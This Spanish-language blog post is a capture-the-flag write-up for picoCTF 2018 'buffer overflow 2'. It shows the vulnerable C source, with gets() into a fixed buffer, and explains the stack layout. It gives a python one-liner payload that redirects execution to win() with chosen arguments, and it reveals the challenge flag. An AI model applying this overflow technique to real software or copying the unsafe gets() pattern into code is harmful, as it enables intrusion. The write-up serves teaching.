Binary Exploitation (III): Solución Reto picoCTF 2018 "buffer overflow 2"

En los dos posts anteriores puse sendas soluciones a dos retos tipo CTF de la categoría 'Binary Exploitation' ("Boofy" y "buffer overflow 1") en las que expliqué brevemente cómo explotar la vulnerabilidad de desbordamiento de 'buffer' (en inglés, 'buffer overflow') para sobrescribir el valor de una variable y para tomar el control del flujo de un programa vulnerable, respectivamente.

Pues bien, en esta entrada doy un paso más que se puede considerar como la suma de los dos casos anteriores.

Para ello, como en el post anterior, utilizo uno de los retos de la plataforma picoCTF 2018.

En este desafío debo obtener el control sobre el flujo del programa, para que éste salte o bifurque a una función determinada, y sobre el contenido de dos variables, que debo pasar como parámetros a dicha función.

El desafío en cuestión, que lleva el título "buffer overflow 2", presenta un nivel de dificultad medio (★★★☆☆).

- buffer overflow 2 - Points: 200:

Su enunciado dice lo siguiente: 'Alright, this time you'll need to control some arguments. Can you get the flag from this program? You can find it in /problems/buffer-overflow-2_0_738235740acfbf7941e233ec2f86f3b4 on the shell server. Source'.

Se proporcionan dos archivos: un ejecutable (vuln) y un fichero con el código fuente (vuln.c).

Y como pista ('Hint') se nos da la siguiente:

- 'Try using gdb to print out the stack once you write to it!'.

Solución: como en los dos posts anteriores a los que he hecho referencia, lo primero que hago es ejecutar el programa; se me pide que introduzca una cadena, incluyo 'A' y se muestra la cadena que he introducido.

Echo ahora un vistazo al código fuente (vuln.c):

#include < stdio.h>
#include < stdlib.h>
#include < string.h>
#include < unistd.h>
#include < sys/types.h>

#define BUFSIZE 100
#define FLAGSIZE 64

void win(unsigned int arg1, unsigned int arg2) {
  char buf[FLAGSIZE];
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
    exit(0);
  }

  fgets(buf,FLAGSIZE,f);
  if (arg1 != 0xDEADBEEF)
    return;
  if (arg2 != 0xDEADC0DE)
    return;
  printf(buf);
}

void vuln(){
  char buf[BUFSIZE];
  gets(buf);
  puts(buf);
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);

  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  puts("Please enter your string: ");
  vuln();
  return 0;
}

Como se observa es un código fuente muy similar al del post anterior, con la principal diferencia de que para que se muestre la 'flag' la función win debe recibir dos parámetros (arg1 y arg2) con los valores 0xDEADBEEF y 0xDEADC0DE, respectivamente.

Es decir, al igual que en el post anterior, debo tomar el control del flujo del programa para que se ejecute la función win y, de forma parecida que en el primer post, tengo que sobrescribir los valores de ambos parámetros para que éstos contengan los valores deseados.

Para que se comprenda la explicación sobre cómo sobrescribir los valores de los dos parámetros citados debo referirme a la pila de ejecución, que es un espacio de memoria que el sistema operativo reserva cuando carga un programa y que se utiliza durante su ejecución.

La pila (en inglés, 'stack') contiene los parámetros de las funciones, sus variables locales y sus direcciones de retorno, y también algunos valores de registros.

En nuestro caso, sin entrar en mayores detalles de cómo se almacenan los datos en la pila, inmediatamente después de la dirección de retorno de la función vuln se encontrarían: la dirección de retorno de la función win, primer parámetro de la función win (arg1) y segundo parámetro de la función win (arg2).

Por tanto, para tomar el control del flujo del programa y que tras finalizarse la ejecución de la función vuln el programa salte a la función win actúo de la misma manera que en el post anterior (hay que tener en cuenta que en este caso el 'buffer' tiene asignado un tamaño de 100 bytes, es decir, hasta el momento tengo una cadena de 112 bytes de "relleno" + dirección de inicio de la función win en formato de almacenamiento 'little-endian'), y para sobrescribir los valores de ambos parámetros basta con añadir a la cadena obtenida hasta este momento un "relleno" de 4 bytes que sobrescribirá la dirección de retorno de la función win + el valor deseado para el primer parámetro de la función win (arg1) en formato de almacenamiento 'little-endian' + el valor deseado para el segundo parámetro de la función win (arg2) en formato de almacenamiento 'little-endian'.

Utilizo una pequeña línea codificada en python para obtener la 'flag': python -c "print 'A' * 112 + '\xcb\x85\x04\x08' + 'A' * 4 + '\xef\xbe\xad\xde' + '\xde\xc0\xad\xde'" | ./vuln:

Con lo que la 'flag' es: picoCTF{addr3ss3s_ar3_3asyada28e9b}